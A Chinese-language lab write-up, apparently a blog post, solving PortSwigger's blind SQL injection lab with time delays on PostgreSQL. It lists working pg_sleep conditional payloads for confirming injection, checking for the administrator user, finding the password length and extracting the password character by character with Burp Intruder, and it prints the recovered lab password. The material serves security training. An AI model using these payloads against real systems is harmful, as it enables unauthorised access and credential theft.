【PortSwiggerのWeb Security Academy靶场】SQL Injection系列 12th

·  阅读 89

Subject

Lab: Blind SQL injection with time delays and information retrieval

Url: portswigger.net/web-securit…


Mind Palace

验证时间盲注的可行性:

';select case when (1=1) then pg_sleep(3) else pg_sleep(0) end--
';select case when (1=2) then pg_sleep(3) else pg_sleep(0) end--
# ==> 使用前需要urlencode(; -> %3b)
复制代码

验证user表中有username字段且存在账户administrator:

';select case when (username='administrator') then pg_sleep(10) else pg_sleep(0) end from users--
复制代码

BP的Intruder模块获取password长度:

';select case when (username='administrator' and length(password)>3) then pg_sleep(10) else pg_sleep(0) end from users--s
复制代码

时间盲注:

# 核心payload
';select case when (substring(password,1,1)='a') then pg_sleep(10) else pg_sleep(0) end from users where username='administrator'--
复制代码

接下来使用BP的Intruder模块+cluster bomb方式获取password

==> 按顺序排列出password = hpolhe7xsrnp25ftjvqj

分类:
后端
标签:
分类:
后端
标签:
收藏成功!
已添加到「」, 点击更改